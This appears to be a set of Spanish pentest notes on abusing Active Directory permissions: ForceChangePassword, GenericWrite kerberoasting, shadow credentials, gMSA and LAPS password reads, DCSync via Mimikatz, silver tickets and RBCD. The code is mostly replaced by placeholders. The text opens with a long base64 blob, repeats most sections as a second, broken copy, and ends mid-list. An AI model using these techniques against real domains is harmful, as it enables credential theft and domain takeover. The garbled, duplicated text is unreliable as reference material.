AC8uA9GTIk3YHK/1GGZWv/p+eNnGDE4H7TZqd4c0os+cuRDzUaTdnyyT9kvmt/XiddZhGkivJGqvQ30B/5hnyDAAIIIGA9gZKOlTUajb293ZbdyTz3JIJLl55JT1dNnplKvtl9IK9Go3HSJZ9vTl3Jf+RMPtHR+PPipciX6U2AfGO93+r0dm5xvAgggIC5QPHSThqNxr9HiuPynbqSf+K0nBqNpnP3FMcmFjFo9sKkMY6bNs8mN/yYTyxYlrRMgc+Lm5eEOeoWIN+QbxBAAAEErCfwZdmKGo1m/ffvm2cRec6+w3kzZdIU/CxjSqP/iSVr1U3qxzN9rqVmnhOX8uXOY8cj4uqOMskeHfnGer/VyVYAMxFAAIF0JVDaqaqdnd2RM8kPWyxHnKbNk4bA6d4nxWYe0XhT6POMf19MZVOly2QqUkKbrpA5WMb3I9wggAACCFhbIFPmzH0G5diy+wMLPyvX5Xkvp52dnaZbgMOx86YJZkpYLjH4zbhJOS1sZMvuD2Yvyp0lK89PWbuKbSFg0X6THmvdFs48yoAAAulWIJv9i5czyE+JW54oWChjtwCHGfNyhS/OPTgwRzmnF09FWV5L+W0pp6rpVjvdHjj5hnyDAAIIIGBVgbz5P1WGjzc9nc3eId1e49PzgZNvrPpbnZ5PNY4dAQQQEAJFvyqbxkyTJaumYKGMZcplKuOYWflT9IuM8is2U93URwUKI58OBcg35BsEEEAAAasKlP66WpasL96gmVI6cXbNsmBZ7r/Omfa8kTsgn7yc77vN7/u0zZ45S0rbeDH//7Rfp8OrO4dMvrHqbzUnHAIIIICAVqf/+LMiKaWS93LahS2w9Mi3HHHExOYfPyj6RcaUtpYz9weAp08B8g35BgEEEEDA2gKlnKom24STPbtm9UZLQ+OYhBvxcf+fHxYuknzEKV6qfPq8unPU5Btr/1ZzziGAAAIIaHX6Ap8XN290+Xbce8kmmFRnrv/+/YxmCef9Dz+GOt0KkG/INwgggAACb0Gg9NfV3sv9vjLiFPws9cH6LASdhk3/p09P5ixZvypXMd1e3Tlw8s1b+K3mtEMAAQQQ0Or0JR0rZ82WXY44Hbuk8sIpC+Hm1JX84YuTXjUl/tllyPBFSUeQ07MA+YZ8gwACCCDw1gSKl3bK8M+NpVRfGG453/x0MOl14uIfL5xKz8lGHDv55q39VnPyIYAAAghodfrCxUuKUDJ7UW7LCcbyt4dOfii28+HHBYFFgHxDvkEAAQQQeMsCxUs7Zc2WvZQ20/K1eSy/Tyqlb9dtf7+RZ7YMGTMW/qIkl3YEeL/mW/6V5hREAAEEEBACJctXzpHz3w40L+4zvcz/Zc2WvXhpJzwREAK03xBxEEAAAQRsQqD019U+K1oii6LHcRrjTcZMmT8u+HnJ8lW4tCMgC5BvbOK3Wq4PJhBAAAEEChb5v/dyvW+XIUOq+cY+x3sfFShMsuGcMRcg35BvEEAAAQRsVKBICW2+Tz7L9f6H2R3ey5gpc4YMGbNld8iZ+4O8HxX4rNiXJR0rm1/VmIOAECDf2OhvNScoAggggAACCLyyAPmGfIMAAggggAACahMg36itRl856rIiAggggAACqhEg35BvEEAAAQQQQEBtAuQbtdWoaqI3B4IAAggggMArC5BvyDcIIIAAAgggoDYB8o3aavSVoy4rIoAAAgggoBoB8g35BgEEEEAAAQTUJkC+UVuNqiZ6cyAI2JSAJEk9+w3W6vQudRpKkjR73iJl8Q4cPLRk2SqtTt9/SKD0v/9OnTmr1elXRkWL2Uaj8dLlK4sil1fQ11JuoXFzX0mSevQdpJxZ0bn2kmWrrl67/vjJk0OHj3bo0kur04sl/3cnSZ/mLYoUZRNfPXz46Pc/jrTx6yY2uHDJ8gMHDyk3vnnbjs3bdog55Sq5zJq78MrVa48exR3581jnHn20Ov3YiSHme5Ekyb9H3269B0iSpNzaqKDgW7Gxsk+yZTDHEavI22nbqfuPe/bevBV77979Y8dPjAoKdqzkIr7dvmNXsoVxquqm1ek9vdvt/WX/o0dxN2/FLlm+SletplhLgPxx5E95F2LCubZHQmLi3ydPiY/nYs6LjcfHx589FzNyXLCY//O+/StWr5HXXbdxy569v8gfFy9defDQYfnjuOApCYmJ+poNxBzLBXap03D9pq2379y9e+/erp9+rt+kpVhrZVT0nn2/ytvU6vQdu/aWJKlKDXflWSRTiBpM9ewSZ6bBYFBuuVwlF3FWW6ho5Rn16FHcH0f+lM8o5aZsc5p8Q75BAAEEUhcwyTcGg6FuQy/5z7oy38THx3t4+sg/YrGVUdEHDx328PT5plmrgAFDr1+/8V30Bnl1rU4fPj/CaDTKgUN8tWPX7pOnznTq3sfTu93MOfMTEhK823ZyrFxD3nh8fHxQ8FTxsXqtBuJq1G/wCA9Pnxa+fiui1hoMhnqNW2h1esv5ZuOW7RcvXe4eMLCpd9upM2YnJia27tClSg13seV+g0dIkuTdrrP4WEFfK9V8k2wZ+g8JNMERZRMHO2nazFOnz3QPGCiSn4enz+o16374cY9j5Rpand7VvZHY+6LI5TEXLoppD08frU7v4enz4OHDNes2tu3UvXf/oWfOxvx64KDYpnx5Vu5Iq9OPnzRNkiRlvlkUudzD06dJyzZBwVONRqNIeGHhC/48dlyupqvXrj96FFfun8h18NDhhYuXyd8eOnzUaDSOCnqRjSwUWFetZsyFiz/v29+6Q5cWvn6btn5/4+atKq4vEozlfCPOIvnwXd0bidxj+eyynG8sVLTyjGru2zEqesP9Bw+ca3vIR23LE+Sb1P+u2XL9UTYEELCOgEm+uXfv/g8/7pF3rcw3Jv+VLJYx+e/yfoNHGI3G8lVc5S1cvHR5UeTyuMeP5XadSi51nj596tctQF5mz75fN27ZLn/U6vQGgyFg4DB5jrgaebfrLM85czYmfH6E5XzTso2fJElerTvIa23a+v1PP++TP3q36yxJktwyodXpU803yZah/5DAZHG0On3X3v2P/X2ysktdeadiImLpiokh05Uzp0yfJZrE5Jnbd+za+8t++WNtD8+ExMTuAQPlxqSLly6HhS+QF3jW3vPXsb8vXLykzDdTps+SF/j1wEHRGuffs198fLwIWPUat3jyxHD9xk3vtp20On3Zis5xcXG9+w8Va9X28ExMTFyybNVvv/8hb0dMmBd4cmhY7O07X1dLannS6vSOlVyuXrs+OTRMJBXL+cbkW7GFVM8uy/lGLrB5RZucUY6VXOLj40VDpryWzU6Qb8g3CCCAQOoCJvlmXPCUp0+f+vfsJ/64v2y++aZZK0mSGvxzV8K7bacnTwwVnWs/uxU1YNhIsc0K+lpGo3H4qCD5+uHeqHnjFm3kj2nJN1u279z0PBJZaL8Jnx9x8tQZ5Wbbduq+IGKpPMf8svdS+UYug4V8c/7CRa9W7bU6fa0GTff/9nts7O1NW7ZXdK5doXrt8xcuyiXR6vQmcaF8FdfHT54oQ96zxp5n4Uw0j4nL87xFkRcvXZY38k2zVkajcd6iyJTyzd5f9q9es06r01dxdX/69GkLXz+tTv/t2IkHDh7a+v3OkNCkJNS4RRtJkkTziVanDwmddfDQYfdGzY1Go1u9xvK+zAus1ekPHT4auWK1cpnAMRMCR49/XfnG5OwSOzLHl+9PySUxr2iTfFO2ovOTJwb5FJVXtM0J8k3qf9dss+YoFQIIWFPAJN94t+scFb0h5vwF8R/3L5tv/Hv0ffr0aTW3+uIQFi9dKVqDlixbtWv3v81CkStWGwyGhUuSbp0ke7Cptt8cOfqXuJRayDcbt2xXtkWZ78j8svdS+UYug/klVuyrdYcucheZY8dPBAVPreRS5/qNmyL//fDjnoZereRSmeSbug29JEkyiX2RK1aLdhRxefZp528wGFp36CI2Er5g8a8HDk4ICTXPN2UqVO/Rd1BCQoLo6qTV6WPOXxg9frJWp9+09fvps+aODpokuuAMGznu6rXrcqmOnzg5ISRUq9P/ffJUqg1O12/cFAvLq8sTJi0x5v1v0tJ+Y3J2iY2b479svnGq6hY+P+LuvXvyeSsX2zYnyDfkGwQQQCB1AfN8U71Wg/v3H4j/mlfmG0mSDIp/cv8b+cpUv0nL4ydO7vrpZ3FVKFOh+vUbN4cEjtHq9L4du8bHx4uuGOLbwDETYi5cfHYJP3L0r/b+PU0uJBbyjVNVt7ETQ4xGo2h+sJBvdu76acPmbSZbVn585XxjUgbRv1hhYxB330LDwsX9o849+pw6/aIl6cHDh1Xd6iXdWVu8THlDxCTfNPVuK0mSW/0mygKHhS84fuKkfH+qqXfbbd//sDIqWixz+crVod+OnTJ9ljLfJCQmGgyGhMTEZ/2mlV2j1m3csnb9pmd30G7eivVp59+gqbfogrNi9Zot23eKDXp4+kiSVNvDU6vTh4aFK7vsJNt+c//BA9FaoyyzmF4ZFW00GpVECQkJyv7FJt+KW5zKVGRydsm7MMc3GAzyWS0WM69oERDj4+MNBoPRaJQkSZyo8mZteYJ8k/rfNVuuP8qGAALWEZCvBMoW+3HBUx49inN1b6TMNyZdaMUTQPJ1Kz4+XpKkXw8clLuztPfvmZCQIDJNmQrVb9y8ZX7xa9up+w8/7klMTOzYtbfyeJPNN/LVKO7x40HDR4nlLeSbLdt37tz1k3KzJtPml71U22+SLYN5/2LR2WjNuo2DR4zW6vSLIpeLHrvlKrkkJiaKYsyau1B5Q8Qk37g3am7efiP3gxGV1bKNX/eAgffu3S9fxbVtp+5JnZyq154xe54y34j+xQ29knp/37wVO2naTLH30UGTTp0529Cr1YOHD8tWdNbq9Nev3/Bu2+nPY8flNhhlN2SRdZTdmU0KrNXpY2Nvj588zQRZfJT7ocs9iIeNHKfMNyb9i+W1RO4xP7vkvZjjN/JqLZ/VYjHzihaAord4k5Ztxk+aZjAYWrX3lzdryxPkG/INAgggkLqAfCVQ5puyFZ1Pnjqzact2Zb5Jtgut8rq1/7ffle0lq9esUzb5GI1G8fiPq3uj5r4dldePfb8eMAkiyeYbcTUKGDA0ITHxm2Yv7uzMmR8h3wMS29yxa3f0hs1anX5+ROSJk6eVO/Ju1zk0LFyeY37ZEw8ti3tzYrHxk6ZdvnJVbjJJtgzmt0jEutu+/0E8GP/Dj3vEs9nOdb65feeu+DZi6Yruff59bN4kLpSv4vrkiSFgwIt+vmKVXT/9LBpd5MpyrOQSe/tO7/5Do6I3CPyw8AXKfKPsXzwtLFzur9PMp73RaJwcGibfwlu/aeu0sPD4+Hifdi8u8zHnLyibVSRJmj5rrihJsu03R/48tmR50mgC8s+AYSNFhlO2xIhvTZ4Pl1sB5XWVz095ePqYnF3yYub4L3t/Smxq368HlO1b8vZtcIJ88+8ZZoPVQ5EQQMBGBJLNN1qdvm2n7k+fPr1z9648/k1K+Ua+MjXzaZ+YmNiyTVKvVcdKLnfu3p0YMl3+7/WAAUONRqNLnYZ9Bg1Pulf1fOATgbB2/Sb5rpaYk2y+kZ9d2rFr9+49Lx6DGjhs5P37D+SBYcpWdL50+Yq4qLft1F2SpCYt/+25vGHzNrm0Wp3ePN+41WssSZJ8gX92IEljwzwfuEWOFKKEyjKYX2LFMus2bhkw9FutTr9r9x5x+6O5b8cLFy+Jb389cNByc8iOXbt/3vfv81Nu9RonJCQoBysSIJErVu/Z9+v9Bw86dU8a3cdCvgkNC485f0HsXTwnder0mXHBU8ScYSPHnTp9Jj4+Xtwb8mrVXpKkNn7d5BqcHxF5+uw5sXCy+WbmnPk3b8XK6bBcJRe5Ll4538j1pTy75DK8ruentDr9L/t/W/Xdizt9yu3b4DT5hnyDAAIIpC6QUr4RPU8lSUp7vtHq9NEbNh86fFQ8F510c0oRYrQ6/bXrN4KCpzpVdTtzNub3P4506t6ncXPfb8dOfNYtQ77fJC4nlvNN/SYtExISxOVcV63mpctXdv30c6v2/i3b+K3buOXZI+7Va70YjO6HH/ecPRfj1y1AjH+TkJioHMbNPN9odfot23eePRfTtXf/pt5tQ0JnJfxz78wk3yjLIG6R1GvcQv5xb9Rcq9NPnzV3zvOH2Octiox6PizQ2vWbHjx8WEFfq22n7ibDEpq032h1+oZerR49ilv1XbR3u869+w89F3NefkhbWZgWvkmPwV+/cbNMherm+Wbh4mX1Grdo0KRln0HD79y9O3fhEvmC/dvvf0iSJLeE1fbwFN2hxAILFy87+te/Y+Rodfr6TVoq86J5gavUcL9y9doPP+5p4evn3bbTxi3bb9y8JTrtpppvDh46LOvVa9xCHv9GzjfKs0ur0wcFTxWdr83DZdrbbwIGDqvXuEUjr9aTps5IemywR18Zx5YnyDep/12z5fqjbAggYB0BC/nGrV7juLi4l8o3ru6N4h4/7jd4xIbN25QjzYhjWbx05eGjSUPuVq/VYGVU9M1bsY+fPDl56ozyWXGxpOV8o9Xplyxbder0GdFxpM43zbbv2BV7+05cXNyevb8on8nSVau5ZPmq2Nt3xBi1IhLJsMnmmwr6Wosil1+6fCUhIeHoX8fFeDPy/Sm5DUlZBvPxi0Unm1bt/cUNshp1Gx47fiLm/IWAAUOXLFt181bskaN/KRtvkm0O0er0Xq07/LL/t7i4uFuxsc96/lZ0ri0Kr8w3Wp3+zNkY+bl3k/YbMSKw0Wi8fOVq+ILFyqGJ5i2KvH7jpqyh1ekvXrosqlur08tD1ygXOH7ixGNNXAAACDtJREFUpJyQzPPNs1aQOt8027nrp7i4uNt37u7YtVseKSDVfCOPXCwmftn/m/lT5fLZJQ45cMyE/9h+I/ZlMBhOnT5D/2JCAwIIIIAAAmkVeNZGMuL5ADDKlMA0Av9FgPabtP76/Rdl1kUAAQQQsCDg3qj5pctXZsyeJ8b+L1/F9V25CWLhoPjq7QqQb8g3CCCAAAJvX8ClTsNFkcvPX7h45+7dK1evbdyyXe4N/XYvk+z9HRUg37z93+p39NSh2AgggAACCNisAPmGfIMAAggggAACahMg36itRm02SlMwBBBAAAEErCZAviHfIIAAAggggIDaBMg3aqtRq0VjdoQAAggggIDNCpBvyDcIIIAAAgggoDYB8o3aatRmozQFQwABBBBAwGoC5BvyDQIIIIAAAgioTYB8o7YatVo0ZkcIIIAAAgjYrAD5hnyDAAIIIIAAAmoTIN+orUZtNkpTMAQQQAABBKwmQL4h3yCAAAIIIICA2gTIN2qrUatFY3aEAAIIIICAzQqQb8g3CCCAAAIIIKA2AfKN2mrUZqM0BUMAAQQQQMBqAuQb8g0CCCCAAAIIqE2AfKO2GrVaNGZHCCCAAAII2KwA+YZ8gwACCCCAAAJqEyDfqK1GbTZKUzAEEEAAAQSsJkC+Id8ggAACCCCAgNoEyDdqq1GrRWN2hAACCCCAgM0KkG/INwgggAACCCCgNgHyjdpq1GajNAVDAAEEEEDAagLkG/INAggggAACCKhNgHyjthq1WjRmRwgggAACCNisAPmGfIMAAggggAACahMg36itRm02SlMwBBBAAAEErCZAviHfIIAAAggggIDaBMg3aqtRq0VjdoQAAggggIDNCpBvyDcIIIAAAgggoDYB8o3aatRmozQFQwABBBBAwGoC5BvyDQIIIIAAAgioTYB8o7YatVo0ZkcIIIAAAgjYrAD5hnyDAAIIIIAAAmoTIN+orUZtNkpTMAQQQAABBKwmQL4h3yCAAAIIIICA2gTIN2qrUatFY3aEAAIIIICAzQqQb8g3CCCAAAIIIKA2AfKN2mrUZqM0BUMAAQQQQMBqAuQb8g0CCCCAAAIIqE2AfKO2GrVaNGZHCCCAAAII2KwA+YZ8gwACCCCAAAJqEyDfqK1GbTZKUzAEEEAAAQSsJkC+Id8ggAACCCCAgNoEyDdqq1GrRWN2hAACCCCAgM0KkG/INwgggAACCCCgNgHyjdpq1GajNAVDAAEEEEDAagLkG/INAggggAACCKhNgHyjthq1WjRmRwgggAACCNisAPmGfIMAAggggAACahMg36itRm02SlMwBBBAAAEErCZAviHfIIAAAggggIDaBMg3aqtRq0VjdoQAAggggIDNCpBvyDcIIIAAAgggoDYB8o3aatRmozQFQwABBBBAwGoC5BvyDQIIIIAAAgioTYB8o7YatVo0ZkcIIIAAAgjYrAD5hnyDAAIIIIAAAmoTIN+orUZtNkpTMAQQQAABBKwmQL4h3yCAAAIIIICA2gTIN2qrUatFY3aEAAIIIICAzQqQb8g3CCCAAAIIIKA2AfKN2mrUZqM0BUMAAQQQQMBqAuQb8g0CCCCAAAIIqE2AfKO2GrVaNGZHCCCAAAII2KwA+YZ8gwACCCCAAAJqEyDfqK1GbTZKUzAEEEAAAQSsJkC+Id8ggAACCCCAgNoEyDdqq1GrRWN2hAACCCCAgM0KkG/INwgggAACCCCgNgHyjdpq1GajNAVDAAEEEEDAagLkG/INAggggAACCKhNgHyjthq1WjRmRwgggAACCNisAPmGfIMAAggggAACahMg36itRm02SlMwBBBAAAEErCZAviHfIIAAAggggIDaBMg3aqtRq0VjdoQAAggggIDNCpBvyDcIIIAAAgggoDYB8o3aatRmozQFQwABBBBAwGoC5BvyDQIIIIAAAgioTYB8o7YatVo0ZkcIIIAAAgjYrAD5hnyDAAIIIIAAAmoTIN+orUZtNkpTMAQQQAABBKwmQL4h3yCAAAIIIICA2gTIN2qrUatFY3aEAAIIIICAzQqQb8g3CCCAAAIIIKA2AfKN2mrUZqM0BUMAAQQQQMBqAuQb8g0CCCCAAAIIqE2AfKO2GrVaNGZHCCCAAAII2KwA+YZ8gwACCCCAAAJqEyDfqK1GbTZKUzAEEEAAAQSsJkC+Id8ggAACCCCAgNoEyDdqq1GrRWN2hAACCCCAgM0KkG/INwgggAACCCCgNgHyjdpq1GajNAVDAAEEEEDAagLkG/INAggggAACCKhNgHyjthq1WjRmRwgggAACCNisAPmGfIMAAggggAACahMg36itRm02SlMwBBBAAAEErCZAviHfIIAAAggggIDaBMg3aqtRq0VjdoQAAggggIDNCpBvyDcIIIAAAgggoDYB8o3aatRmozQFQwABBBBAwGoC5BvyDQIIIIAAAgioTYB8o7YatVo0ZkcIIIAAAgjYrAD5hnyDAAIIIIAAAmoTIN+orUZtNkpTMAQQQAABBKwmQL4h3yCAAAIIIICA2gTIN2qrUatFY3aEAAIIIICAzQqQb8g3CCCAAAIIIKA2AfKN2mrUZqM0BUMAAQQQQMBqAuQb8g0CCCCAAAIIqE2AfKO2GrVaNGZHCCCAAAII2KwA+YZ8gwACCCCAAAJqEyDfqK1GbTZKUzAEEEAAAQSsJkC+Id8ggAACCCCAgNoEyDdqq1GrRWN2hAACCCCAgM0KkG/INwgggAACCCCgNgHyjdpq1GajNAVDAAEEEEDAagLkG/INAggggAACCKhNgHyjthq1WjRmRwgggAACCNiswP8D1G6U+pPi+okAAAAASUVORK5CYII=">
{{CODE_BLOCK_19}}
# **ForceChangePassword**
Crackear hash
{{CODE_BLOCK_20}}
Cambias pass
{{CODE_BLOCK_21}}
{{CODE_BLOCK_22}}
# **WriteSPN**
{{CODE_BLOCK_23}}
Con kerberos:
{{CODE_BLOCK_24}}
{{CODE_BLOCK_25}}
# **GenericWrite**
- Vamos a hacerle **kerberoast**:
{{CODE_BLOCK_26}}
O así
{{CODE_BLOCK_27}}
o así:
{{CODE_BLOCK_28}}
- Añadirnos a un grupo sobre el que tenemos Generic Write
{{CODE_BLOCK_29}}
{{CODE_BLOCK_30}}
- **Credenciales en la sombra**
Las **credenciales en la sombra** son una técnica de persistencia y escalada de privilegios en Active Directory que **consiste en inyectar un certificado tuyo en una cuenta de AD** (como `winrm_svc`), usando el atributo:
`msDS-KeyCredentialLink`
Una vez inyectado, puedes **autenticarse como esa cuenta usando Kerberos/PKINIT**, **sin necesidad de su contraseña o hash**.
{{CODE_BLOCK_31}}
Con kerberos:
{{CODE_BLOCK_32}}
# AddMember
Da opción de añadir miembros a un grupo como de quitar miembros.
{{CODE_BLOCK_33}}
{{CODE_BLOCK_34}}
# **ReadGMSAPassword**
`ReadGMSAPassword` es una **función de Windows** (más específicamente de Active Directory) que se refiere a la capacidad de leer la **contraseña de una cuenta de servicio administrada de grupo**, conocida como **gMSA** (_Group Managed Service Account_).
---
### 🔐 ¿Qué es una gMSA?
Una **gMSA (Group Managed Service Account)** es un tipo especial de cuenta en Active Directory que:
- Es **administrada automáticamente por el dominio** (incluye rotación automática de contraseñas).
- Está diseñada para **servicios o aplicaciones que corren en múltiples servidores**.
- Su contraseña es **conocida solo por el sistema**, y normalmente **no accesible para los humanos**.
---
### 📥 ¿Qué hace `ReadGMSAPassword`?
La **permisión `ReadGMSAPassword`** determina **qué equipos o usuarios** tienen permitido **leer (recuperar) la contraseña cifrada** de una cuenta gMSA desde el **Controlador de Dominio (DC)**.
Un **equipo o servicio** que tiene esta capacidad puede:
- Solicitar la contraseña de la gMSA al DC.
- Utilizar esa contraseña para autenticarse como la gMSA.
{{CODE_BLOCK_35}}
# ReadLAPSPassword
{{CODE_BLOCK_36}}
# **DCSync**
{{CODE_BLOCK_37}}
### Kerberos
{{CODE_BLOCK_38}}
# **Buscar objetos borrados** 🗑️
Y posteriormente restablecerlos, quizás sea necesario habilitarlos
{{CODE_BLOCK_39}}
# **Rebuscar en la papelera de reciclaje local** 🗑️
{{CODE_BLOCK_40}}
{{CODE_BLOCK_41}}
# Silver Ticket Attack 🎟️
If you compromise an **account's password with a SPN** you can use that password to create a Silver Ticket impersonating any user to that service.
**Delegation vs Direct Access:** Directly connecting to the MSSQL service using a password relies on the permissions assigned to the `**svc_mssql**` account within SQL Server. This includes permissions defined in roles, explicit grants, or denies, etc. The MSSQL service checks the account's permissions within the context of SQL Server.
**Silver Ticket and Service Account:** Crafting a silver ticket means you're effectively impersonating the `**svc_mssql**` service account at the Kerberos authentication level. In the context of MSSQL, this account might have been configured (often mistakenly) with higher or sysadmin privileges, especially if it's the account used to run the SQL Server service. This can often be the case
### **Procedimiento**
- Para obtener el nthash en base a la contraseña:
[NTLM HASH Generator](https://codebeautify.org/ntlm-hash-generator)
- Para obtener el SPN:
{{CODE_BLOCK_42}}
{{CODE_BLOCK_43}}
- Para obtener el SID
{{CODE_BLOCK_44}}
`/etc/krb5.conf`
{{CODE_BLOCK_45}}
{{CODE_BLOCK_46}}
{{CODE_BLOCK_47}}
Por eiemplo
{{CODE_BLOCK_48}}
1. **Qué hace un silver ticket**
- Cuando forjas un silver ticket estás creando un _TGS_ (Ticket-Granting Service) para un SPN concreto (p. ej. `MSSQL/nagoya...`).
- Ese TGS se cifra con la **clave de la cuenta de servicio** asociada al SPN (es decir, el NT hash de la cuenta bajo la que corre MSSQL o la cuenta mapeada al SPN).
- Por tanto, el receptor lógico del ticket —el servicio que tiene la clave— puede descifrarlo y verificar su integridad.
2. **Quién valida el ticket al llegar**
- El servidor de aplicación (o su proceso de autenticación —ej. LSASS en Windows/SQL Server) **recibe** el ticket y lo **descifra** con la clave del service account.
- Si el descifrado es correcto y las comprobaciones locales que haga el servicio pasan, el servicio te “acepta” como la identidad que figura en el ticket.
- **No hace falta** que el KDC (`krbtgt`) haya emitido ese ticket porque el servicio sólo necesita poder descifrar/verificarlo con su propia clave.
3. **Entonces… ¿qué papel tiene `krbtgt` normalmente?**
- En un flujo Kerberos legítimo, el KDC (mediante la clave `krbtgt`) firma/autoriza el PAC y emite tickets. Esa firma permite a servicios confiar en las memberships/atributos dentro del PAC.
- Al forjar un silver ticket se _salta_ la emisión por el KDC; por eso la firma del KDC sobre el PAC **no estará presente o no será válida**. Algunos servicios comprueban esa firma; otros no.
4. **Por qué algunos servicios aceptan el ticket aun sin krbtgt**
- Muchos servicios / configuraciones sólo requieren que el ticket se descifre correctamente con la clave del SPN y no validan la firma del PAC contra el KDC. En esos casos aceptan los SIDs/memberships que trae el ticket.
- Otros servicios (o configuraciones más estrictas) **sí** verifican la validez del PAC o consultan al DC para confirmar atributos; en esos casos el silver ticket puede fallar o comportarse de forma limitada.
5. **Resumen en una línea**
- **No te estás “autenticando contra `krbtgt`** porque no necesitas que el KDC te entregue el ticket: te estás autenticando contra el servicio objetivo (la cuenta/SPN) que posee la clave usada para cifrar y descifrar ese ticket.**
# Default Domain Policy - Generic Write
[SharpGPOAbuse/SharpGPOAbuse-master at main · byronkg/SharpGPOAbuse · GitHub](https://github.com/byronkg/SharpGPOAbuse/tree/main/SharpGPOAbuse-master)
{{CODE_BLOCK_49}}
{{CODE_BLOCK_50}}
# Unconstrained Delegation
Imagina un escenario común de 3 niveles:
1. **Usuario:** Un empleado.
2. **Servicio Front-end:** Un servidor web (Ej: IIS).
3. **Servicio Back-end:** Un servidor de base de datos (Ej: SQL Server).
El usuario accede al servidor web. El servidor web necesita consultar la base de datos _en nombre del usuario_ (para aplicar sus permisos).
Con la **Delegación No Restringida**, se marcaba la cuenta del servidor web como "Confiable para delegación" (Trusted for Delegation) en AD.
- **El Riesgo 🚨:** Si un atacante comprometía el servidor web (Front-end), obtenía un poder inmenso. Podía suplantar a _cualquier usuario_ (incluido un Administrador de Dominio que hubiera iniciado sesión en el servidor web) y usar esa identidad para acceder a _cualquier otro servicio_ en el dominio (controladores de dominio, servidores de archivos, etc.). Era un "cheque en blanco".
# Constrained Delegation
Se especifica una lista blanca de servicios a los que puede acceder el Front-end (solo al servicio de bases de datos)
### Kerberos Constrained Delegation (KCD) Tradicional
Se edita el atributo `msDS-AllowedToDelegateTo` del Front-end con una lista de SPNs a los que permite acceder
### Resource-Based Constrained Delegation (RBCD)
Se editaría el atributo `msDS-AllowedToActOnBehalfOfOtherIdentity` en el **backend** esta vez. Esto lista las cuentas de servicio o máquinas que tienen permiso para delegar hacia el backend.
El dueño del backend decide que frontends pueden suplantar usuarios para acceder a su backend.
Sobre el ordenador sobre el que podemos modificar `msDS-AllowedToActOnBehalfOfOtherIdentity`
{{CODE_BLOCK_51}}
"Soy `COMPUTER$`, y quiero que me des un ticket de servicio como si yo fuera el usuario `backupadmin`":
{{CODE_BLOCK_52}}
-PrincipalsAllowedToDelegateToAccount 'COMPUTER
"Soy `COMPUTER$`, y quiero que me des un ticket de servicio como si yo fuera el usuario `backupadmin`":
{{CODE_BLOCK_52}}
--attr msDS-ManagedPassword
Para añadir un usuario a un grupo usando autenticación por kerberos
WriteOwner
Si tienes permiso WriteOwner, puedes cambiar el propietario del objeto sobre el que tienes WriteOwner a ti mismo, para así luego ponerle GenericAll por ejemplo.
{{CODE_BLOCK_14}}
{{CODE_BLOCK_15}}
DCsync
-
Simulación de replicación: Un atacante con los permisos adecuados en un controlador de dominio (usualmente, un Administrador de dominio o Administrador de Enterprise) puede usar herramientas como Mimikatz para simular el proceso de replicación de un controlador de dominio.
-
Extracción de contraseñas: Al realizar una replicación del dominio, el atacante puede solicitar contraseñas de cuentas, hashes de contraseñas y otros atributos de las cuentas de usuario (como las contraseñas almacenadas en el atributo
msDS-ReplicatorPasswords). -
Uso de herramientas: Mimikatz es una de las herramientas más utilizadas para ejecutar un ataque DCsync. Al emplear la funcionalidad de
lsadump::dcsyncen Mimikatz, el atacante puede recuperar las contraseñas de los usuarios de la base de datos de Active Directory, incluida la cuenta de Administrator o cuentas con privilegios elevados.
Generic All
-
Nos da control total sobre un usuario
-
Por tener GenericAll sobre un grupo no tenemos GenericAll sobre los integrantes
Para cambiar su contraseña:
Kerberoast (PRIMERA FORMA)
AS-REPRoast (SEGUNDA FORMA)
Podemos añadir al usuario P.AGILA SERVICE ACCOUNTS
{{CODE_BLOCK_19}}
ForceChangePassword
Crackear hash
Cambias pass
{{CODE_BLOCK_22}}
WriteSPN
{{CODE_BLOCK_23}}
Con kerberos:
{{CODE_BLOCK_24}}
{{CODE_BLOCK_25}}
GenericWrite
- Vamos a hacerle kerberoast:
O así
{{CODE_BLOCK_27}}
o así:
{{CODE_BLOCK_28}}
- Añadirnos a un grupo sobre el que tenemos Generic Write
{{CODE_BLOCK_30}}
- Credenciales en la sombra
Las credenciales en la sombra son una técnica de persistencia y escalada de privilegios en Active Directory que consiste en inyectar un certificado tuyo en una cuenta de AD (como winrm_svc), usando el atributo:
msDS-KeyCredentialLink
Una vez inyectado, puedes autenticarse como esa cuenta usando Kerberos/PKINIT, sin necesidad de su contraseña o hash.
{{CODE_BLOCK_31}}
Con kerberos:
{{CODE_BLOCK_32}}
AddMember
Da opción de añadir miembros a un grupo como de quitar miembros.
{{CODE_BLOCK_33}}
{{CODE_BLOCK_34}}
ReadGMSAPassword
ReadGMSAPassword es una función de Windows (más específicamente de Active Directory) que se refiere a la capacidad de leer la contraseña de una cuenta de servicio administrada de grupo, conocida como gMSA (Group Managed Service Account).
🔐 ¿Qué es una gMSA?
Una gMSA (Group Managed Service Account) es un tipo especial de cuenta en Active Directory que:
-
Es administrada automáticamente por el dominio (incluye rotación automática de contraseñas).
-
Está diseñada para servicios o aplicaciones que corren en múltiples servidores.
-
Su contraseña es conocida solo por el sistema, y normalmente no accesible para los humanos.
📥 ¿Qué hace ReadGMSAPassword?
La permisión ReadGMSAPassword determina qué equipos o usuarios tienen permitido leer (recuperar) la contraseña cifrada de una cuenta gMSA desde el Controlador de Dominio (DC).
Un equipo o servicio que tiene esta capacidad puede:
-
Solicitar la contraseña de la gMSA al DC.
-
Utilizar esa contraseña para autenticarse como la gMSA.
ReadLAPSPassword
{{CODE_BLOCK_36}}
DCSync
{{CODE_BLOCK_37}}
Kerberos
{{CODE_BLOCK_38}}
Buscar objetos borrados 🗑️
Y posteriormente restablecerlos, quizás sea necesario habilitarlos
Rebuscar en la papelera de reciclaje local 🗑️
{{CODE_BLOCK_40}}
{{CODE_BLOCK_41}}
Silver Ticket Attack 🎟️
If you compromise an account's password with a SPN you can use that password to create a Silver Ticket impersonating any user to that service.
Delegation vs Direct Access: Directly connecting to the MSSQL service using a password relies on the permissions assigned to the **svc_mssql** account within SQL Server. This includes permissions defined in roles, explicit grants, or denies, etc. The MSSQL service checks the account's permissions within the context of SQL Server.
Silver Ticket and Service Account: Crafting a silver ticket means you're effectively impersonating the **svc_mssql** service account at the Kerberos authentication level. In the context of MSSQL, this account might have been configured (often mistakenly) with higher or sysadmin privileges, especially if it's the account used to run the SQL Server service. This can often be the case
Procedimiento
- Para obtener el nthash en base a la contraseña:
- Para obtener el SPN:
{{CODE_BLOCK_43}}
- Para obtener el SID
/etc/krb5.conf
{{CODE_BLOCK_46}}
{{CODE_BLOCK_47}}
Por eiemplo
-
Qué hace un silver ticket
-
Cuando forjas un silver ticket estás creando un TGS (Ticket-Granting Service) para un SPN concreto (p. ej.
MSSQL/nagoya...). -
